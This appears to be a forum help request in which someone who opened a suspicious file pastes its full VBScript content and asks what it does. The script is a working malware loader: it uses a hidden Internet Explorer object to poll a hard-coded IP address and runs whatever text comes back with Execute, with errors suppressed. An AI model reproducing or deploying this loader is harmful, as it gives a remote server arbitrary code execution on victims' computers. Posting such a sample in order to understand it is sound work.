I unwisely opened the file. I was sure that Windows will ask me if I am sure to run this script, but unfortunately, it wasn't. Now I am wondering what that file is exactly doing. Can anyone help?
content of the file:
' fffff
' ssssss
Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"
Call SookCanalTV(2 + 2)
Function TroceSHello(kpserial)
On Error Resume Next
DSLOVIEI.Quit()
Execute "" + kpserial + ""
End Function
Function DSLOVIEIChek(stcurl)
Set DSLOVIEI = CreateObject("InternetExplorer.Application")
DSLOVIEI.Visible = 0
DSLOVIEI.navigate stcurl
While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend
DSLOVIEIChek = DSLOVIEI.document.body.innerText
End Function
Sub SookCanalTV(one)
On Error Resume Next
While ubigs < one
WScript.Sleep 10 + 3
Call onlineZolo()
WScript.Sleep 11000
Wend
End Sub
Function onlineZolo()
Dim promazzzzz
foxtomnum = CStr(foxtomnum + 1)
promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function